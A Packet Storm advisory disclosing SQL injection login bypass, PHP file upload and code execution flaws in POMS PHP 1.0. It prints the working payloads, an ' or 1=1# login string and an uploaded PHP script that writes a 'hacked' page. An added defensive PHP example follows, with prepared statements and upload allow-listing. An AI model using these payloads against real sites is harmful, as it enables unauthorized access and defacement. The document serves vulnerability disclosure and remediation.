Packet Storm advisory PACKETSTORM:178493 by nu11secur1ty
Published: May 09, 2024

POMS PHP 1.0 SQL Injection / Shell Upload

Source: packetstormsecurity.com
Tags: poms-php, oretnom23, sql injection, shell upload, authentication bypass, file upload, rce, exploits, proof

AI Score: 7.4 High (Confidence: Low)

`## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK  
1. SQLi Bypass Authentication  
2. File Upload  
3. RCE  
## Latest update from the vendor: 5 hours 32 minutes ago  
## Author: nu11secur1ty  
## Date: 05/07/2024  
## Vendor: https://github.com/oretnom23  
## Software:  
https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/sql-injection,  
https://portswigger.net/web-security/file-upload,  
https://portswigger.net/web-security/authentication  
  
## Description:  
SQLi-Bypass-Authentication:  
The username parameter is not properly sanitized, so an attacker can bypass  
authentication and log in to the system.  
  
---------------------------------------------------------------------------------------------------------------------------------------  
FU (File Upload):  
Using this vulnerability, the attacker can upload any PHP file to the  
server.  
The parameter id="cimg" is not securely sanitized.  
STATUS: CRITICAL vulnerability  
  
---------------------------------------------------------------------------------------------------------------------------------------  
RCE:  
The attacker can upload a malicious file with hazardous content and then  
use it to create another file on the server.  
STATUS: CRITICAL vulnerability  
  
[+]Exploits:  
- SQLi bypass authentication:  
```mysql  
nu11secur1ty' or 1=1#  
```  
  
- FU:  
```php  
<?php  
phpinfo();  
?>  
```  
  
- RCE:  
```php  
<?php  
// by nu11secur1ty - 2023  
$fh = fopen('test.html', 'a');  
fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');  
fclose($fh);  
//unlink('test.html');  
?>  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html)  
  
## Time spent:  
00:35:00  
`
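
Added example (not part of the advisory, and not POMS or vendor code): a defensive counterpart to the two input-handling flaws described above, pairing a parameterized login query with an allow-listed upload check for an image field such as `cimg`. The `users` table, its columns, the allow-list and the file-naming scheme are assumptions made for illustration.

```php
<?php
// Added example, not POMS code: table/column names, the allow-list and the
// naming scheme are assumptions. Sample inputs below are constructed.

// Login lookup with a bound parameter: the username is data, never SQL text.
function find_user(PDO $db, string $username, string $password): ?array
{
    $stmt = $db->prepare('SELECT id, username, pw_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pw_hash'])) {
        return null;
    }
    return $row;
}

// Upload check for an image field such as "cimg": allow-list on the sniffed
// content type, and a server-generated name so the client never picks the
// extension. Returns null when the upload must be rejected.
function safe_image_name(string $bytes): ?string
{
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if (!is_string($mime) || !isset($allowed[$mime])) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
}

// Constructed demo data: in-memory SQLite with one account.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
$ins = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The advisory's login string is matched literally, so no row is found.
var_dump(find_user($db, "nu11secur1ty' or 1=1#", 'x') === null);
var_dump(find_user($db, 'admin', 'correct horse')['username'] === 'admin');

// A PHP script is refused; a minimal GIF header gets a random .gif name.
var_dump(safe_image_name("<?php phpinfo(); ?>") === null);
var_dump(preg_match('/^[0-9a-f]{32}\.gif$/',
    (string) safe_image_name("GIF89a\x01\x00\x01\x00\x00\x00\x00;")) === 1);
```

Content sniffing alone does not stop a file that is both a valid image and a script, so the server-chosen extension is what matters here, and the upload directory should not be configured to execute PHP.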
